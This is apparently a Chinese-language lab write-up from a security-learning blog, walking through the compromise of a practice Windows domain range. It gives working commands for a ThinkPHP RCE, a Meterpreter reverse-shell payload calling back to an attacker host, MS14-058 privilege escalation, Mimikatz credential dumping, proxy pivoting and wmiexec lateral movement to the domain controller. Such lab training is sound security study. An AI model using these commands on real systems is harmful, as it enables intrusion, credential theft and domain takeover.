无境红日靶场五 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)------了解成因和手工注入方法
  6. SQL注入(2)------各种注入
  7. SQL注入(3)------SQLMAP
  8. SQL注入(4)------实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)------一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)------各种木马的生成及简单的免杀
  23. MSF(3)------apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 内网渗透初探
  29. 记对外国某服务器的内网渗透
  30. 一次丝滑的内网渗透拿下域控
  31. 实战内网PTH上线域控
  32. 通过路由器进行内网渗透
  33. 钓鱼邮件和钓鱼样本
  34. 无境vulntarget-a wp
  35. 无境ZeroLogon 练习 wp
  36. 无境三层综合渗透 wp

一层Win7

WebShell

目标IP:192.168.111.150,用nmap快速扫全端口

bash 复制代码
nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.150

重点是80端口的web服务,打开发现是一个Thinkphp

使用利用工具测试,存在ThinkPHP 5.0.22/5.1.29 RCE

用工具一键getshell

Administrator权限的Win7,明显在域中

Msf

用reverse_tcp生成shellcode

bash 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.25 lport=6666 -f exe > 1.exe

msfconsole这样子配置

bash 复制代码
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

把生成的1.exe放到服务器上运行,成功获取到meterpreter

提权

systeminfo看补丁信息

我靠这么多

考虑使用MS14-058进行提权

bash 复制代码
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.111.25
set target 1
run

成功得到SYSTEM的meterpreter

抓密码

bash 复制代码
load kiwi
bash 复制代码
creds_all

666演都不演了,得到密码为dc123.com

横向

systeminfo查到当前域为sun.com

用meterpreter直接查域控

bash 复制代码
run post/windows/gather/enum_domain

得到域控IP为192.168.138.138

二层域控

一级代理

用autoroute建立一级代理,走192.168.138.0/24段

bash 复制代码
run post/multi/manage/autoroute

然后创建socks5代理

bash 复制代码
use auxiliary/server/socks_proxy
run

用proxychain来配置代理,在/etc/proxychain4.conf最后一行加上

bash 复制代码
socks5	127.0.0.1 1080

可以用nc测试代理是否建立成功

bash 复制代码
proxychains nc -zv 192.168.138.138 445

能连通即为成功

wmiexec

直接用psexec横向getshell

bash 复制代码
proxychains impacket-wmiexec SUN/Administrator:'dc123.com'@192.168.138.138

好简单的靶场

相关推荐
云水一下4 天前
零基础玩转bWAPP靶场(七十一):Slow HTTP DoS(慢速HTTP拒绝服务)
web安全·bwapp·slowhttptest
虎头金猫4 天前
4K 视频总卡在公网带宽?用 N1 + OpenList 把网盘播放链路重新理顺
运维·服务器·网络·python·容器·beautifulsoup·pandas
龙亘川4 天前
一网统管AI平台民生业务实践:基于城市数字底座赋能公积金业务服务升级
大数据·安全·智慧城市·开源软件·数据可视化·政务
wuyk5554 天前
《WiFi 嵌入式物联网开发全套实战》| 第 16 章 ESP32 AP+STA 双模共存原理与工程坑点
网络·stm32·物联网
kybs19914 天前
全球灾害数据分析可视化 毕业设计-附源码66794
vue.js·spring boot·mysql·安全·django·c#·asp.net
LorryJovens4 天前
【LAAP科研】双系统具身AGI范式研究——基于LAAP认知架构与Jev概率决策模型的系统性技术调研与范式验证
人工智能·gpt·安全·架构
其实防守也摸鱼4 天前
内网穿透与反向代理:原理、工具与实战指南
android·大数据·运维·安全·网络安全·自动化·渗透
山东科恩光电4 天前
提升安全性的关键技术:安全触边在工业自动化中的应用解析
安全
QYRdata4 天前
年均增速24.2%!机器人数据湖未来六年增长动能强劲
网络·机器人·服务发现